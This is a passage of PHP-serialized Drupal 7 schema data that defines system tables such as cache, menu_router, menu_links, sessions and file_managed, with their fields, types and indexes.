null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:10:\"parameters\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:5:\"label\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:1:\"0\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"aid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:7:\"actions\";}s:5:\"batch\";a:5:{s:6:\"fields\";a:4:{s:3:\"bid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:5:\"token\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:9:\"timestamp\";a:2:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;}s:5:\"batch\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"bid\";}s:7:\"indexes\";a:1:{s:5:\"token\";a:1:{i:0;s:5:\"token\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:5:\"batch\";}s:11:\"blocked_ips\";a:5:{s:6:\"fields\";a:2:{s:3:\"iid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:2:\"ip\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:40;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:7:\"indexes\";a:1:{s:10:\"blocked_ip\";a:1:{i:0;s:2:\"ip\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"iid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:11:\"blocked_ips\";}s:5:\"cache\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:5:\"cache\";}s:15:\"cache_bootstrap\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:15:\"cache_bootstrap\";}s:10:\"cache_form\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:10:\"cache_form\";}s:10:\"cache_page\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:10:\"cache_page\";}s:10:\"cache_menu\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:10:\"cache_menu\";}s:10:\"cache_path\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:10:\"cache_path\";}s:16:\"date_format_type\";a:5:{s:6:\"fields\";a:3:{s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:5:\"title\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:7:\"default\";i:0;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"type\";}s:7:\"indexes\";a:1:{s:5:\"title\";a:1:{i:0;s:5:\"title\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:16:\"date_format_type\";}s:12:\"date_formats\";a:5:{s:6:\"fields\";a:4:{s:4:\"dfid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;s:8:\"unsigned\";b:1;}s:6:\"format\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:100;s:8:\"not null\";b:1;s:6:\"binary\";b:1;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:7:\"default\";i:0;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"dfid\";}s:11:\"unique keys\";a:1:{s:7:\"formats\";a:2:{i:0;s:6:\"format\";i:1;s:4:\"type\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:12:\"date_formats\";}s:18:\"date_format_locale\";a:4:{s:6:\"fields\";a:3:{s:6:\"format\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:100;s:8:\"not null\";b:1;s:6:\"binary\";b:1;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:8:\"language\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:2:{i:0;s:4:\"type\";i:1;s:8:\"language\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:18:\"date_format_locale\";}s:12:\"file_managed\";a:7:{s:6:\"fields\";a:8:{s:3:\"fid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:8:\"filename\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"uri\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:6:\"binary\";b:1;}s:8:\"filemime\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"filesize\";a:5:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:3:\"big\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:9:\"timestamp\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:3:{s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:6:\"status\";a:1:{i:0;s:6:\"status\";}s:9:\"timestamp\";a:1:{i:0;s:9:\"timestamp\";}}s:11:\"unique keys\";a:1:{s:3:\"uri\";a:1:{i:0;s:3:\"uri\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"fid\";}s:12:\"foreign keys\";a:1:{s:10:\"file_owner\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:12:\"file_managed\";}s:10:\"file_usage\";a:5:{s:6:\"fields\";a:5:{s:3:\"fid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:2:\"id\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"count\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:4:{i:0;s:3:\"fid\";i:1;s:4:\"type\";i:2;s:2:\"id\";i:3;s:6:\"module\";}s:7:\"indexes\";a:3:{s:7:\"type_id\";a:2:{i:0;s:4:\"type\";i:1;s:2:\"id\";}s:9:\"fid_count\";a:2:{i:0;s:3:\"fid\";i:1;s:5:\"count\";}s:10:\"fid_module\";a:2:{i:0;s:3:\"fid\";i:1;s:6:\"module\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:10:\"file_usage\";}s:5:\"flood\";a:5:{s:6:\"fields\";a:5:{s:3:\"fid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:5:\"event\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:10:\"identifier\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"expiration\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"fid\";}s:7:\"indexes\";a:2:{s:5:\"allow\";a:3:{i:0;s:5:\"event\";i:1;s:10:\"identifier\";i:2;s:9:\"timestamp\";}s:5:\"purge\";a:1:{i:0;s:10:\"expiration\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:5:\"flood\";}s:11:\"menu_router\";a:5:{s:6:\"fields\";a:23:{s:4:\"path\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"load_functions\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;}s:16:\"to_arg_functions\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;}s:15:\"access_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:16:\"access_arguments\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;}s:13:\"page_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"page_arguments\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;}s:17:\"delivery_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"fit\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:12:\"number_parts\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:7:\"context\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"tab_parent\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"tab_root\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"title_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:15:\"title_arguments\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"theme_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:15:\"theme_arguments\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"type\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:11:\"description\";a:2:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;}s:8:\"position\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:12:\"include_file\";a:2:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:6:\"medium\";}}s:7:\"indexes\";a:3:{s:3:\"fit\";a:1:{i:0;s:3:\"fit\";}s:10:\"tab_parent\";a:3:{i:0;a:2:{i:0;s:10:\"tab_parent\";i:1;i:64;}i:1;s:6:\"weight\";i:2;s:5:\"title\";}s:21:\"tab_root_weight_title\";a:3:{i:0;a:2:{i:0;s:8:\"tab_root\";i:1;i:64;}i:1;s:6:\"weight\";i:2;s:5:\"title\";}}s:11:\"primary key\";a:1:{i:0;s:4:\"path\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:11:\"menu_router\";}s:10:\"menu_links\";a:5:{s:6:\"fields\";a:25:{s:9:\"menu_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"mlid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"plid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"link_path\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:11:\"router_path\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:10:\"link_title\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:7:\"options\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:12:\"translatable\";b:1;}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:6:\"system\";}s:6:\"hidden\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:8:\"external\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:12:\"has_children\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:8:\"expanded\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"depth\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:10:\"customized\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:2:\"p1\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p2\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p3\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p4\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p5\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p6\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p7\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p8\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p9\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"updated\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}}s:7:\"indexes\";a:4:{s:9:\"path_menu\";a:2:{i:0;a:2:{i:0;s:9:\"link_path\";i:1;i:128;}i:1;s:9:\"menu_name\";}s:22:\"menu_plid_expand_child\";a:4:{i:0;s:9:\"menu_name\";i:1;s:4:\"plid\";i:2;s:8:\"expanded\";i:3;s:12:\"has_children\";}s:12:\"menu_parents\";a:10:{i:0;s:9:\"menu_name\";i:1;s:2:\"p1\";i:2;s:2:\"p2\";i:3;s:2:\"p3\";i:4;s:2:\"p4\";i:5;s:2:\"p5\";i:6;s:2:\"p6\";i:7;s:2:\"p7\";i:8;s:2:\"p8\";i:9;s:2:\"p9\";}s:11:\"router_path\";a:1:{i:0;a:2:{i:0;s:11:\"router_path\";i:1;i:128;}}}s:11:\"primary key\";a:1:{i:0;s:4:\"mlid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:10:\"menu_links\";}s:5:\"queue\";a:5:{s:6:\"fields\";a:5:{s:7:\"item_id\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:9:\"serialize\";b:1;}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:7:\"item_id\";}s:7:\"indexes\";a:2:{s:12:\"name_created\";a:2:{i:0;s:4:\"name\";i:1;s:7:\"created\";}s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:5:\"queue\";}s:8:\"registry\";a:5:{s:6:\"fields\";a:5:{s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:9;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"filename\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:2:{i:0;s:4:\"name\";i:1;s:4:\"type\";}s:7:\"indexes\";a:1:{s:4:\"hook\";a:3:{i:0;s:4:\"type\";i:1;s:6:\"weight\";i:2;s:6:\"module\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:8:\"registry\";}s:13:\"registry_file\";a:4:{s:6:\"fields\";a:2:{s:8:\"filename\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:4:\"hash\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:8:\"filename\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:13:\"registry_file\";}s:9:\"semaphore\";a:5:{s:6:\"fields\";a:3:{s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"value\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"expire\";a:3:{s:4:\"type\";s:5:\"float\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:1;}}s:7:\"indexes\";a:2:{s:5:\"value\";a:1:{i:0;s:5:\"value\";}s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:4:\"name\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:9:\"semaphore\";}s:9:\"sequences\";a:4:{s:6:\"fields\";a:1:{s:5:\"value\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:5:\"value\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:9:\"sequences\";}s:8:\"sessions\";a:6:{s:6:\"fields\";a:7:{s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"sid\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;}s:4:\"ssid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"hostname\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"cache\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"session\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}}s:11:\"primary key\";a:2:{i:0;s:3:\"sid\";i:1;s:4:\"ssid\";}s:7:\"indexes\";a:3:{s:9:\"timestamp\";a:1:{i:0;s:9:\"timestamp\";}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:4:\"ssid\";a:1:{i:0;s:4:\"ssid\";}}s:12:\"foreign keys\";a:1:{s:12:\"session_user\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:8:\"sessions\";}s:6:\"system\";a:5:{s:6:\"fields\";a:9:{s:8:\"filename\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"owner\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"bootstrap\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:14:\"schema_version\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:-1;s:4:\"size\";s:5:\"small\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not 